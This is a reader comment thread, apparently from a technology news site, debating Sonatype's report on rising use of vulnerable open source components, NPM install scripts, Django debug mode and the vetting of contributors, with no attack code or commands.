Facepalm
Well, thank goodness for proprietary closed-source software where vulnerabilities don't get detected, reported or fixed and therefore don't exist.
I don't suppose those Open Sourcerers would ever consider issuing patches, either.
Use of vulnerable open source components has doubled over the last year despite their role in the high profile Equifax mega-breach. Sonatype’s fourth annual Software Supply Chain Report, published on Tuesday (available here, registration required), revealed a 120 per cent rise in the use of vulnerable open source components …
Just how different are code repositories from that of the primary O.S repositories of the major Linux distros. And, how much more probable is it that a zero day will show up in an alpha or beta repo than a that of a release version. I'm thinking these things need to get some moderation and other security controls.
Oooh, that looks like a very big straw man you've just set up there.....
This is about an increase in vulnerabilities in open source. Putting your fingers in your ears and going "la la la, closed source is worse" doesn't cut it.
How is the open source community going to reverse this and increase security? How bad does it have to get before they pay attention to it at all?
"“The time required for hackers to exploit a newly disclosed open source vulnerability has shrunk 400% in the last decade.”
How can the exploit time fluctuate if the Source Code has been in the public domain all the time?"
I want to know how something can shrink by more than 100%, but there you go.
Well since "Several of the problems listed by Sonatype involved messing around with NPM, a utility used by JavaScript projects to install dependencies" I'd say that the problem is NOT open source software per se; it's the reliance on a potentially buggy [and security risk] system for "updates".
Updates are overrated, ESPECIALLY when they result in CREATING back-doors and viruses and trojans [oh my!]. You don't need "bleeding edge" all of the time. It's better to have something STABLE that gets timely security patches. This goes TRIPLE for things that "change the rules" (Firefox 57 comes to mind) on you, even though you REALLY LIKE THE ONE YOU HAVE and REALLY HATE WHAT THEY DID TO IT.
"Just because a buggy application is 'open source' does NOT mean that 'open source' is the problem." - Captain Obvious
Also worth pointing out that Javascript is in and of itself "a problem".
The problem isn't open source per se, it is that the code gets fixed, published, people can look at it and work out easily where the problems were and quickly exploit them. With closed source, they need to reverse engineer or get lucky. Once the fix is published, with closed source, they have a heads up where to look, which also shortens the exploit time there.
Add in that, as said, a lot of security updates never get centrally reported, as stated in the article, just in the daily check-ins and release notes, which most people only read if they are actualy installing an update, if at all. That means most users never even know there are security patches available.
But a lot of open source is installed and forgotten about, because it is "open source" and not Microsoft / IBM / SAP, it often sits unloved on a server somewhere in the metaphorical corner and doesn't get updated, because it isn't "core" to the company's LoB.
That gives a lot more scope for exploiting open source software, not because it is worse than closed source, but because the information is easily accessible by hackers, down to which lines of code have been modified, and the users often aren't informed in time that there are patches available, unless it is a major issue. The dozens of minor issues that the devs discover themselves and patch quietly in the check-in logs are still available to the hackers, but which user pours over the daily check-in logs of every bit of software they have installed?
No, people who don't know how to use JavaScript but insist on writing it are the problem. Just like people can write bad code in any other language. And knowledge of other curly bracket languages does not make you a JavaScript developer or mean that your lack of understanding is JavaScript's fault.
This makes sense. Yes, it's open source, but in practice they're much like binaries - many install scripts have active payloads on install - you have to trust the code before seeing it (though you could browse what's _hopefully_ the same code on GitHub).
Open source collaboration is too valuable, and even high quality closed source is not sufficiently superior wrt security, for us to seriously roll back in time.
But this trust by default reminds me a bit of when we were still exchanging EXEs and active VBAs in Outlook. It was only a matter of time till someone got hurt.
What gets my goat is when StackOverflow questions on how to do something simple in Python, JS, Chef, Ansible, Django get answered with "oh, don't worry your pretty little head, install package XYZ". Who cares if the code you'd need to write yourself would be <20 lines vs installing a package that's 4 yrs old, has 1, unknown, author, and only 200 downloads?
DJango deserves its own category. How many web authors leave it in 'debug' mode to avoid the complexity of identifying everything that's capable of being downloaded...
nevermind it's bloatware on steroids written in python for good measure.
icon for DJango in and of itself. yeah. PHP and CGI for the win!
he he. we agree on something. on debug mode django dumps out stack traces to the browser. all daemon-visible server env variables too, for extra transparency, though there’s i believe a regex to scrub out ‘.*(secret|password).*.
django 101: debug = True ’s only for dev. if someone’s too dumb to know that it’s like someone not knowing you should always assume a gun is loaded.
I'm more interested in the fact that hackers were caught installing vulnerabilities directly into the source code and very few people are noticing. The ones that have been reported are probably the tip of the iceberg. That is one of the big issues with open source, when everybody is working on it, who is vetting these people and making sure that they are not doing something nefarious? Brings to mind "too many cooks...."
Indeed, much more interesting.
Or would be, if it were more than a dark hint. Who exactly is being accused here? Developer communities? Packagers? Distributors? And what are they accused of: malice, incompetence, insufficient oversight, being blackmailed, ??? Or is this just the case that's been my bugbear for years, of downloads from reputable sources but with no cryptographic signature?